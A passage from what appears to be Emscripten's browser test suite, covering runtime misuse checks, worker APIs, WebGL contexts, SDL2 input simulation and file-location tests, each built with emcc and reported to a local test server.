self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.test_port
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=1']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
open('library.c', 'w').write(r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
run_process([PYTHON, EMCC, 'library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args += ['--browser_args', ' ' + ' '.join(browser_args)]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
run_process([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'], stdout=PIPE, stderr=PIPE)
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
open('pre.js', 'w').write(r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0', timeout=20)
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
# Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/kripken/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'USE_WEBGL2=1', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
run_process([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
run_process([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
run_process([PYTHON, EMCC, 'second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
assert os.path.exists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
run_process([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
run_process([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@flaky
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
